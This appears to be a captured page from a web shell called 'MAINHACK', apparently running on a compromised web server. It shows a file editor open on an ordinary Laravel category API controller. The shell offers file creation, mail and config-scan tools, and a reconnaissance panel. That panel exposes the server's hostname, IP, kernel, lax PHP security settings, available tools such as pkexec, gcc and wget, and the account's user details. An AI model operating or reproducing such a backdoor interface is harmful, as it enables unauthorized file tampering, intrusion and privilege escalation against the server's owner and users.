[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: AcnooCategoryController.php
<?php namespace App\Http\Controllers\Api; use App\Http\Controllers\Controller; use App\Models\Category; use Illuminate\Http\Request; class AcnooCategoryController extends Controller { /** * Display a listing of the resource. */ public function index() { $data = Category::where('business_id', auth()->user()->business_id)->latest()->get(); return response()->json([ 'message' => __('Data fetched successfully.'), 'data' => $data, ]); } /** * Store a newly created resource in storage. */ public function store(Request $request) { $business_id = auth()->user()->business_id; $request->validate([ 'categoryName' => 'required|unique:categories,categoryName,NULL,id,business_id,' . $business_id, ]); $data = Category::create([ 'categoryName' => $request->categoryName, 'variationCapacity' => $request->variationCapacity == 'true' ? 1 : 0, 'variationColor' => $request->variationColor == 'true' ? 1 : 0, 'variationSize' => $request->variationSize == 'true' ? 1 : 0, 'variationType' => $request->variationType == 'true' ? 1 : 0, 'variationWeight' => $request->variationWeight == 'true' ? 1 : 0, 'business_id' => $business_id ]); return response()->json([ 'message' => __('Data saved successfully.'), 'data' => $data, ]); } /** * Update the specified resource in storage. */ public function update(Request $request, Category $category) { $request->validate([ 'categoryName' => [ 'required', 'unique:categories,categoryName,' . $category->id . ',id,business_id,' . auth()->user()->business_id, ], ]); $category = $category->update([ 'categoryName' => $request->categoryName, 'variationCapacity' => $request->variationCapacity == 'true' ? 1 : 0, 'variationColor' => $request->variationColor == 'true' ? 1 : 0, 'variationSize' => $request->variationSize == 'true' ? 1 : 0, 'variationType' => $request->variationType == 'true' ? 1 : 0, 'variationWeight' => $request->variationWeight == 'true' ? 1 : 0, ]); return response()->json([ 'message' => __('Data saved successfully.'), 'data' => $category, ]); } /** * Remove the specified resource from storage. */ public function destroy(Category $category) { $category->delete(); return response()->json([ 'message' => __('Data deleted successfully.'), ]); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.47 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002